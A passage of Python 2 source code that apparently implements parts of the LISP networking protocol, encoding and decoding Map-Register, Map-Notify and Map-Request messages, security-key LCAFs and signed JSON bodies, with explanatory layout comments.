            hash_output = hmac.new(key, packet, self.icv).hexdigest()
            hash_output = hash_output[0:40]
        return (hash_output)

    def add_key_by_nonce(self, nonce):
        if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
            lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
        lisp_crypto_keys_by_nonce[nonce][self.key_id] = self

    def delete_key_by_nonce(self, nonce):
        if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
        lisp_crypto_keys_by_nonce.pop(nonce)

    def add_key_by_rloc(self, addr_str, encap):
        keys = lisp_crypto_keys_by_rloc_encap if encap else \
            lisp_crypto_keys_by_rloc_decap

        if (keys.has_key(addr_str) == False):
            keys[addr_str] = [None, None, None, None]
        keys[addr_str][self.key_id] = self

        #
        # Tell the data-plane about a new decap key.
        #
        if (encap == False):
            lisp_write_ipc_decap_key(addr_str, keys[addr_str])

    def encode_lcaf(self, rloc_addr):
        pub_key = self.normalize_pub_key(self.local_public_key)
        key_len = self.key_length(pub_key)
        sec_len = (6 + key_len + 2)
        if (rloc_addr != None): sec_len += rloc_addr.addr_length()

        packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
            LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)

        #
        # Append the cipher-suite byte, a reserved byte, and the key
        # length, followed by the public key in 64-bit chunks.
        #
        cs = self.cipher_suite
        packet += struct.pack("BBH", cs, 0, socket.htons(key_len))

        for i in range(0, key_len * 2, 16):
            key = int(pub_key[i:i + 16], 16)
            packet += struct.pack("Q", byte_swap_64(key))

        #
        # Append the RLOC address, if supplied.
        #
        if (rloc_addr):
            packet += struct.pack("H", socket.htons(rloc_addr.afi))
            packet += rloc_addr.pack_address()
        return (packet)

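    # LCAF Security Type layout sketch (illustrative) as encoded above:
    #
    #   AFI=16387 | rsvd(2) | type=11 | rsvd | length(2) | key-count=1 | rsvd
    #   cipher-suite | rsvd | key-length(2) | public key ... | RLOC AFI+addr
    #
    # struct.calcsize("HBBBBHBB") is 10 bytes of fixed header before the
    # cipher-suite byte.
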
    def decode_lcaf(self, packet, lcaf_len):

        #
        # Parse the LCAF header if the caller has not already done so.
        #
        if (lcaf_len == 0):
            packet_format = "HHBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return (None)

            afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack(
                packet_format, packet[:format_size])

            if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
                packet = packet[lcaf_len + 6::]
                return (packet)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]

        #
        # Parse the key-count, cipher-suite, and key-length fields.
        #
        lcaf_type = LISP_LCAF_SECURITY_TYPE
        packet_format = "BBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return (None)

        key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
            packet[:format_size])

        packet = packet[format_size::]
        key_len = socket.ntohs(key_len)
        if (len(packet) < key_len): return (None)

        #
        # Reject cipher-suites this implementation does not support.
        #
        cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
            LISP_CS_25519_CHACHA, LISP_CS_1024]
        if (cs not in cs_list):
            lprint("Cipher-suites {} supported, received {}".format(cs_list,
                cs))
            packet = packet[key_len::]
            return (packet)

        self.cipher_suite = cs

        #
        # Assemble the remote public key from 64-bit network-order chunks.
        #
        pub_key = 0
        for i in range(0, key_len, 8):
            key = byte_swap_64(struct.unpack("Q", packet[i:i + 8])[0])
            pub_key <<= 64
            pub_key |= key
        self.remote_public_key = pub_key

        #
        # curve25519 wants the key as a 32-byte binary string.
        #
        if (self.curve25519):
            key = lisp_hex_string(self.remote_public_key)
            key = key.zfill(64)
            binary = ""
            for i in range(0, len(key), 2):
                binary += chr(int(key[i:i + 2], 16))
            self.remote_public_key = binary

        packet = packet[key_len::]
        return (packet)

class lisp_thread():
    def __init__(self, name):
        self.thread_name = name
        self.thread_number = -1
        self.number_of_pcap_threads = 0
        self.number_of_worker_threads = 0
        self.input_queue = Queue.Queue()
        self.input_stats = lisp_stats()
        self.lisp_packet = lisp_packet(None)

class lisp_control_header():
    def __init__(self):
        self.type = 0
        self.record_count = 0
        self.nonce = 0
        self.rloc_probe = False
        self.smr_bit = False
        self.smr_invoked_bit = False
        self.ddt_bit = False
        self.to_etr = False
        self.to_ms = False
        self.info_reply = False

    def decode(self, packet):
        packet_format = "BBBBQ"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return (False)

        typeval, byte2, byte3, self.record_count, self.nonce = struct.unpack(
            packet_format, packet[:format_size])

        self.type = typeval >> 4
        if (self.type == LISP_MAP_REQUEST):
            self.smr_bit = True if (typeval & 0x01) else False
            self.rloc_probe = True if (typeval & 0x02) else False
            self.smr_invoked_bit = True if (byte2 & 0x40) else False

        if (self.type == LISP_ECM):
            self.ddt_bit = True if (typeval & 0x04) else False
            self.to_etr = True if (typeval & 0x02) else False
            self.to_ms = True if (typeval & 0x01) else False

        if (self.type == LISP_NAT_INFO):
            self.info_reply = True if (typeval & 0x08) else False
        return (True)

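    # Decode sketch (illustrative): the message type lives in the top four
    # bits of the first byte, so a Map-Request (type 1) probing an RLOC
    # would start with 0x12 (type 1, P bit 0x02):
    #
    #   raw = struct.pack("BBBBQ", 0x12, 0, 0, 1, 0)
    #   hdr = lisp_control_header()
    #   hdr.decode(raw)
    #   hdr.type             # 1
    #   hdr.is_rloc_probe()  # True
    #
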
    def is_info_request(self):
        return ((self.type == LISP_NAT_INFO and
            self.is_info_reply() == False))

    def is_info_reply(self):
        return (True if self.info_reply else False)

    def is_rloc_probe(self):
        return (True if self.rloc_probe else False)

    def is_smr(self):
        return (True if self.smr_bit else False)

    def is_smr_invoked(self):
        return (True if self.smr_invoked_bit else False)

    def is_ddt(self):
        return (True if self.ddt_bit else False)

    def is_to_etr(self):
        return (True if self.to_etr else False)

    def is_to_ms(self):
        return (True if self.to_ms else False)

class lisp_map_register():
    def __init__(self):
        self.proxy_reply_requested = False
        self.lisp_sec_present = False
        self.xtr_id_present = False
        self.map_notify_requested = False
        self.mobile_node = False
        self.merge_register_requested = False
        self.use_ttl_for_timeout = False
        self.map_register_refresh = False
        self.record_count = 0
        self.nonce = 0
        self.alg_id = 0
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = 0
        self.xtr_id = 0
        self.site_id = 0
        self.sport = 0
        self.encrypt_bit = 0
        self.encryption_key_id = None

    def print_map_register(self):
        xtr_id = lisp_hex_string(self.xtr_id)

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
            "{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
            "0x{}, site-id: {}")
        lprint(line.format(bold("Map-Register", False),
            "P" if self.proxy_reply_requested else "p",
            "S" if self.lisp_sec_present else "s",
            "I" if self.xtr_id_present else "i",
            "T" if self.use_ttl_for_timeout else "t",
            "R" if self.merge_register_requested else "r",
            "M" if self.mobile_node else "m",
            "N" if self.map_notify_requested else "n",
            "F" if self.map_register_refresh else "f",
            "E" if self.encrypt_bit else "e",
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID)
            else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else
            ""), self.auth_len, xtr_id, self.site_id))

    def encode(self):
        first_long = (LISP_MAP_REGISTER << 28) | self.record_count
        if (self.proxy_reply_requested): first_long |= 0x08000000
        if (self.lisp_sec_present): first_long |= 0x04000000
        if (self.xtr_id_present): first_long |= 0x02000000
        if (self.map_register_refresh): first_long |= 0x1000
        if (self.use_ttl_for_timeout): first_long |= 0x800
        if (self.merge_register_requested): first_long |= 0x400
        if (self.mobile_node): first_long |= 0x200
        if (self.map_notify_requested): first_long |= 0x100
        if (self.encryption_key_id != None):
            first_long |= 0x2000
            first_long |= self.encryption_key_id << 14

        #
        # Auth-length depends on the hash algorithm in use.
        #
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.auth_len = 0
        else:
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
            if (self.alg_id == LISP_SHA_256_128_ALG_ID):
                self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        packet = self.zero_auth(packet)
        return (packet)

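    # Flag layout sketch (illustrative): the first long of a Map-Register
    # is type(4 bits) | flags | record-count(8 bits). For one record with
    # proxy-reply and Map-Notify requested:
    #
    #   first_long = (3 << 28) | 0x08000000 | 0x100 | 1   # 0x38000101
    #
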
    def zero_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_data = ""
        auth_len = 0
        if (self.alg_id == LISP_NONE_ALG_ID): return (packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
            auth_len = struct.calcsize("QQI")
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
            auth_len = struct.calcsize("QQQQ")
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return (packet)

    def encode_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        auth_data = self.auth_data
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return (packet)

    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return ([None, None])

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return ([None, None])

        self.nonce, self.key_id, self.alg_id, self.auth_len = struct.unpack(
            packet_format, packet[:format_size])

        self.nonce = byte_swap_64(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        self.proxy_reply_requested = True if (first_long & 0x08000000) \
            else False
        self.lisp_sec_present = True if (first_long & 0x04000000) else False
        self.xtr_id_present = True if (first_long & 0x02000000) else False
        self.use_ttl_for_timeout = True if (first_long & 0x800) else False
        self.map_register_refresh = True if (first_long & 0x1000) else False
        self.merge_register_requested = True if (first_long & 0x400) \
            else False
        self.mobile_node = True if (first_long & 0x200) else False
        self.map_notify_requested = True if (first_long & 0x100) else False
        self.record_count = first_long & 0xff

        #
        # The E bit says the payload is encrypted with the key-id carried
        # in bits 14-16.
        #
        self.encrypt_bit = True if first_long & 0x2000 else False
        if (self.encrypt_bit):
            self.encryption_key_id = (first_long >> 14) & 0x7

        #
        # The xtr-id and site-id trail the message, if present.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(orig_packet) == False):
                return ([None, None])

        packet = packet[format_size::]

        #
        # Parse and validate the authentication fields.
        #
        if (self.auth_len != 0):
            if (len(packet) < self.auth_len): return ([None, None])

            if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
                LISP_SHA_256_128_ALG_ID)):
                lprint("Invalid authentication alg-id: {}".format(
                    self.alg_id))
                return ([None, None])

            auth_len = self.auth_len
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                format_size = struct.calcsize("QQI")
                if (auth_len < format_size):
                    lprint("Invalid sha1-96 authentication length")
                    return ([None, None])
                auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
                auth4 = ""
            elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
                format_size = struct.calcsize("QQQQ")
                if (auth_len < format_size):
                    lprint("Invalid sha2-256 authentication length")
                    return ([None, None])
                auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                    packet[:auth_len])
            else:
                lprint("Unsupported authentication alg-id value {}".format(
                    self.alg_id))
                return ([None, None])

            self.auth_data = lisp_concat_auth_data(self.alg_id, auth1,
                auth2, auth3, auth4)
            orig_packet = self.zero_auth(orig_packet)
            packet = packet[self.auth_len::]

        return ([orig_packet, packet])

    def encode_xtr_id(self, packet):
        xtr_id_upper = self.xtr_id >> 64
        xtr_id_lower = self.xtr_id & 0xffffffffffffffff
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        site_id = byte_swap_64(self.site_id)
        packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
        return(packet)

    def decode_xtr_id(self, packet):
        format_size = struct.calcsize("QQQ")
        if (len(packet) < format_size): return([None, None])
        packet = packet[len(packet) - format_size::]
        xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
            packet[:format_size])
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
        self.site_id = byte_swap_64(site_id)
        return(True)
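
#
# Usage sketch for the xTR-ID helpers above: a 128-bit xTR-ID is split into
# two 64-bit halves for "QQ"/"QQQ" packing and reassembled the same way on
# decode. _demo_xtr_id_split is illustrative only and not called anywhere.
#
def _demo_xtr_id_split(xtr_id=0x0123456789abcdeffedcba9876543210):
    upper = xtr_id >> 64
    lower = xtr_id & 0xffffffffffffffff
    assert ((upper << 64) | lower) == xtr_id
    return(upper, lower)
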
class lisp_map_notify():
    def __init__(self, lisp_sockets):
        self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.etr_port = 0
        self.retransmit_timer = None
        self.lisp_sockets = lisp_sockets
        self.retry_count = 0
        self.record_count = 0
        self.alg_id = LISP_NONE_ALG_ID
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = ""
        self.nonce = 0
        self.nonce_key = ""
        self.packet = None
        self.site = ""
        self.map_notify_ack = False
        self.eid_records = ""
        self.eid_list = []

    def print_notify(self):
        auth_data = binascii.hexlify(self.auth_data)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
            auth_data = self.auth_data
        elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
            auth_data = self.auth_data

        line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
            "{}{}{}, auth-len: {}, auth-data: {}")
        lprint(line.format(bold("Map-Notify-Ack", False) if \
            self.map_notify_ack else bold("Map-Notify", False),
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.alg_id == LISP_SHA_1_96_ALG_ID) \
            else (" (sha2)" if (self.alg_id == LISP_SHA_256_128_ALG_ID) else \
            ""), self.auth_len, auth_data))

    def zero_auth(self, packet):
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
        packet += auth_data
        return(packet)

    def encode(self, eid_records, password):
        if (self.map_notify_ack):
            first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
        else:
            first_long = (LISP_MAP_NOTIFY << 28) | self.record_count

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        if (self.alg_id == LISP_NONE_ALG_ID):
            self.packet = packet + eid_records
            return(self.packet)

        #
        # Run the authentication hash across the header (with a zeroed auth
        # field) plus the EID-records, then splice the hash into the packet.
        #
        packet = self.zero_auth(packet)
        packet += eid_records

        hashval = lisp_hash_me(packet, self.alg_id, password, False)

        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        self.auth_data = hashval
        packet = packet[0:offset] + hashval + packet[offset + auth_len::]
        self.packet = packet
        return(packet)

    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
        self.record_count = first_long & 0xff
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(packet_format, packet[:format_size])

        self.nonce_key = lisp_hex_string(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        packet = packet[format_size::]
        self.eid_records = packet[self.auth_len::]

        if (self.auth_len == 0): return(self.eid_records)

        #
        # Extract the authentication data and return the packet with the
        # auth field zeroed so the hash can be verified.
        #
        if (len(packet) < self.auth_len): return(None)

        auth_len = self.auth_len
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
            auth4 = ""
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                packet[:auth_len])
        self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
            auth3, auth4)

        format_size = struct.calcsize("I") + struct.calcsize("QHH")
        packet = self.zero_auth(orig_packet[:format_size])
        format_size += auth_len
        packet += orig_packet[format_size::]
        return(packet)
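
#
# Usage sketch for the Map-Notify header handling above: build and re-parse
# the first 32-bit word. Illustrative only; assumes this module's
# LISP_MAP_NOTIFY constant.
#
def _demo_map_notify_first_long(record_count=2):
    import socket, struct
    first_long = (LISP_MAP_NOTIFY << 28) | record_count
    wire = struct.pack("I", socket.htonl(first_long))
    decoded = socket.ntohl(struct.unpack("I", wire)[0])
    assert (decoded >> 28) == LISP_MAP_NOTIFY
    assert (decoded & 0xff) == record_count
    return(decoded)
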
class lisp_map_request():
    def __init__(self):
        self.auth_bit = False
        self.map_data_present = False
        self.rloc_probe = False
        self.smr_bit = False
        self.pitr_bit = False
        self.smr_invoked_bit = False
        self.mobile_node = False
        self.xtr_id_present = False
        self.local_xtr = False
        self.dont_reply_bit = False
        self.itr_rloc_count = 0
        self.record_count = 0
        self.nonce = 0
        self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.itr_rlocs = []
        self.keys = None
        self.privkey_filename = None
        self.map_request_signature = None
        self.subscribe_bit = False
        self.xtr_id = None
        self.json_telemetry = None

    def print_prefix(self):
        if (self.target_group.is_null()):
            return(green(self.target_eid.print_prefix(), False))
        return(green(self.target_eid.print_sg(self.target_group), False))

    def print_map_request(self):
        xtr_id_str = ""
        if (self.xtr_id != None and self.subscribe_bit):
            xtr_id_str = "subscribe, xtr-id: 0x{}, ".format(
                lisp_hex_string(self.xtr_id))

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
            "count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
            "afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")

        lprint(line.format(bold("Map-Request", False),
            "A" if self.auth_bit else "a",
            "D" if self.map_data_present else "d",
            "R" if self.rloc_probe else "r",
            "S" if self.smr_bit else "s",
            "P" if self.pitr_bit else "p",
            "I" if self.smr_invoked_bit else "i",
            "M" if self.mobile_node else "m",
            "X" if self.xtr_id_present else "x",
            "L" if self.local_xtr else "l",
            "D" if self.dont_reply_bit else "d", self.itr_rloc_count,
            self.record_count, lisp_hex_string(self.nonce),
            self.source_eid.afi, green(self.source_eid.print_address(), False),
            " (with sig)" if self.map_request_signature != None else "",
            self.target_eid.afi, green(self.print_prefix(), False),
            xtr_id_str))

        keys = self.keys
        for itr_rloc in self.itr_rlocs:
            if (itr_rloc.afi == LISP_AFI_LCAF and self.json_telemetry != None):
                continue
            addr_str = red(itr_rloc.print_address_no_iid(), False)
            lprint(" itr-rloc: afi {} {}{}".format(itr_rloc.afi, addr_str,
                "" if (keys == None) else ", " + keys[1].print_keys()))
            keys = None

        if (self.json_telemetry != None):
            lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
                self.json_telemetry))

    def sign_map_request(self, privkey):
        sig_eid = self.signature_eid.print_address()
        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        self.map_request_signature = privkey.sign(sig_data)
        sig = binascii.b2a_base64(self.map_request_signature)
        sig = {"source-eid": source_eid, "signature-eid": sig_eid,
            "signature": sig}
        return(json.dumps(sig))
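
    #
    # Minimal signing sketch (illustrative, not called anywhere): assuming
    # "mr" is a lisp_map_request with source/target/signature EIDs stored
    # and "privkey" is an ecdsa.SigningKey (the same type encode() loads
    # from self.privkey_filename):
    #
    #   json_string = mr.sign_map_request(privkey)
    #
    # The signed payload is the nonce rendered in hex concatenated with the
    # printed source-EID and target-EID strings; the result is the JSON
    # body that encode_json() wraps in an LCAF.
    #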
    def verify_map_request_sig(self, pubkey):
        sig_eid = green(self.signature_eid.print_address(), False)
        if (pubkey == None):
            lprint("Public-key not found for signature-EID {}".format(sig_eid))
            return(False)

        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        pubkey = binascii.a2b_base64(pubkey)

        good = True
        try:
            key = ecdsa.VerifyingKey.from_pem(pubkey)
        except:
            lprint("Invalid public-key in mapping system for sig-eid {}". \
                format(self.signature_eid.print_address_no_iid()))
            good = False

        if (good):
            try:
                good = key.verify(self.map_request_signature, sig_data)
            except:
                good = False

        passfail = bold("passed" if good else "failed", False)
        lprint("Signature verification {} for EID {}".format(passfail,
            sig_eid))
        return(good)

    def encode_json(self, json_string):
        lcaf_type = LISP_LCAF_JSON_TYPE
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_len = socket.htons(len(json_string) + 4)
        json_len = socket.htons(len(json_string))
        packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
            lcaf_len, json_len)
        packet += json_string
        packet += struct.pack("H", 0)
        return(packet)
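
    #
    # Wire layout produced by encode_json(): a 2-byte AFI of LISP_AFI_LCAF,
    # four bytes of rsvd/flags/type/rsvd with type LISP_LCAF_JSON_TYPE, a
    # 2-byte LCAF length (len(json_string) + 4 as encoded here), a 2-byte
    # JSON length, the JSON string itself, and a terminating 2-byte AFI
    # of 0.
    #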
    def encode(self, probe_dest, probe_port):
        first_long = (LISP_MAP_REQUEST << 28) | self.record_count

        telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
        if (telemetry != None): self.itr_rloc_count += 1
        first_long = first_long | (self.itr_rloc_count << 8)

        if (self.auth_bit): first_long |= 0x08000000
        if (self.map_data_present): first_long |= 0x04000000
        if (self.rloc_probe): first_long |= 0x02000000
        if (self.smr_bit): first_long |= 0x01000000
        if (self.pitr_bit): first_long |= 0x00800000
        if (self.smr_invoked_bit): first_long |= 0x00400000
        if (self.mobile_node): first_long |= 0x00200000
        if (self.xtr_id_present): first_long |= 0x00100000
        if (self.local_xtr): first_long |= 0x00004000
        if (self.dont_reply_bit): first_long |= 0x00002000

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)

        #
        # Encode the source-EID as a signature JSON LCAF when a private-key
        # file or a precomputed signature is available, otherwise as an
        # instance-id LCAF or a plain AFI-encoded address.
        #
        encode_sig = False
        filename = self.privkey_filename
        if (filename != None and os.path.exists(filename)):
            f = open(filename, "r"); key = f.read(); f.close()
            try:
                key = ecdsa.SigningKey.from_pem(key)
            except:
                return(None)
            json_string = self.sign_map_request(key)
            encode_sig = True
        elif (self.map_request_signature != None):
            sig = binascii.b2a_base64(self.map_request_signature)
            json_string = {"source-eid": self.source_eid.print_address(),
                "signature-eid": self.signature_eid.print_address(),
                "signature": sig}
            json_string = json.dumps(json_string)
            encode_sig = True

        if (encode_sig):
            packet += self.encode_json(json_string)
        else:
            if (self.source_eid.instance_id != 0):
                packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
                packet += self.source_eid.lcaf_encode_iid()
            else:
                packet += struct.pack("H", socket.htons(self.source_eid.afi))
                packet += self.source_eid.pack_address()

        #
        # For an RLOC-probe, use any crypto keys already negotiated with the
        # probed RLOC.
        #
        if (probe_dest):
            if (probe_port == 0): probe_port = LISP_DATA_PORT
            addr_str = probe_dest.print_address_no_iid() + ":" + \
                str(probe_port)
            if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
                self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]

        #
        # Encode the ITR-RLOCs; when lisp-crypto is enabled the first one
        # carries the security-key LCAF.
        #
        for itr_rloc in self.itr_rlocs:
            if (lisp_data_plane_security and
                self.itr_rlocs.index(itr_rloc) == 0):
                if (self.keys == None or self.keys[1] == None):
                    keys = lisp_keys(1)
                    self.keys = [None, keys, None, None]
                keys = self.keys[1]
                keys.add_key_by_nonce(self.nonce)
                packet += keys.encode_lcaf(itr_rloc)
            else:
                packet += struct.pack("H", socket.htons(itr_rloc.afi))
                packet += itr_rloc.pack_address()

        #
        # Append a JSON LCAF carrying telemetry data when configured.
        #
        if (telemetry != None):
            ts = str(time.time())
            telemetry = lisp_encode_telemetry(telemetry, io=ts)
            self.json_telemetry = telemetry
            packet += self.encode_json(telemetry)

        mask_len = 0 if self.target_eid.is_binary() == False else \
            self.target_eid.mask_len

        subscribe = 0
        if (self.subscribe_bit):
            subscribe = 0x80
            self.xtr_id_present = True
            if (self.xtr_id == None):
                self.xtr_id = random.randint(0, (2 ** 128) - 1)

        packet += struct.pack("BB", subscribe, mask_len)

        if (self.target_group.is_null() == False):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_sg(self.target_group)
        elif (self.target_eid.instance_id != 0 or
            self.target_eid.is_geo_prefix()):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_iid()
        else:
            packet += struct.pack("H", socket.htons(self.target_eid.afi))
            packet += self.target_eid.pack_address()

        if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
        return(packet)
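
    #
    # First-long flag bits used by encode() above and decode() below, high
    # to low: A(uth) 0x08000000, map-Data 0x04000000, Rloc-probe 0x02000000,
    # Smr 0x01000000, Pitr 0x00800000, smr-Invoked 0x00400000, Mobile-node
    # 0x00200000, Xtr-id-present 0x00100000, Local-xtr 0x00004000 and
    # Dont-reply 0x00002000; the ITR-RLOC count sits in bits 8-12 and the
    # record count in the low byte.
    #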
    def lcaf_decode_json(self, packet):
        packet_format = "BBBBHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
            struct.unpack(packet_format, packet[:format_size])

        if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)

        #
        # Validate lengths: the LCAF length must cover the JSON string plus
        # the trailing 2-byte AFI.
        #
        lcaf_len = socket.ntohs(lcaf_len)
        json_len = socket.ntohs(json_len)
        packet = packet[format_size::]
        if (len(packet) < lcaf_len): return(None)
        if (lcaf_len != json_len + 2): return(None)

        #
        # Extract the JSON string.
        #
        json_string = packet[0:json_len]
        packet = packet[json_len::]

        #
        # Telemetry JSON is stored as-is and not parsed further.
        #
        if (lisp_is_json_telemetry(json_string) != None):
            self.json_telemetry = json_string

        #
        # Consume the terminating AFI; if it is not 0, hand the remainder
        # back unparsed.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0): return(packet)

        if (self.json_telemetry != None): return(packet)

        #
        # Otherwise this should be a signature body; parse the JSON.
        #
        try:
            json_string = json.loads(json_string)
        except:
            return(None)

        if (json_string.has_key("source-eid") == False): return(packet)
        eid_str = json_string["source-eid"]
        afi = LISP_AFI_IPV4 if eid_str.count(".") == 3 else LISP_AFI_IPV6 \
            if eid_str.count(":") == 7 else None
        if (afi == None):
            lprint("Bad JSON 'source-eid' value: {}".format(eid_str))
            return(None)

        self.source_eid.afi = afi
        self.source_eid.store_address(eid_str)

        if (json_string.has_key("signature-eid") == False): return(packet)
        eid_str = json_string["signature-eid"]
        if (eid_str.count(":") != 7):
            lprint("Bad JSON 'signature-eid' value: {}".format(eid_str))
            return(None)

        self.signature_eid.afi = LISP_AFI_IPV6
        self.signature_eid.store_address(eid_str)

        if (json_string.has_key("signature") == False): return(packet)
        sig = binascii.a2b_base64(json_string["signature"])
        self.map_request_signature = sig
        return(packet)
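
    #
    # Example of a signature JSON body accepted above (illustrative values):
    #
    #   {"source-eid": "10.0.0.1", "signature-eid": "1111:2222::1",
    #    "signature": "<base64 ecdsa signature>"}
    #
    # Telemetry JSON is recognized by lisp_is_json_telemetry() and kept
    # unparsed in self.json_telemetry.
    #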
    def decode(self, packet, source, port):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        first_long = socket.ntohl(first_long)
        self.auth_bit = True if (first_long & 0x08000000) else False
        self.map_data_present = True if (first_long & 0x04000000) else False
        self.rloc_probe = True if (first_long & 0x02000000) else False
        self.smr_bit = True if (first_long & 0x01000000) else False
        self.pitr_bit = True if (first_long & 0x00800000) else False
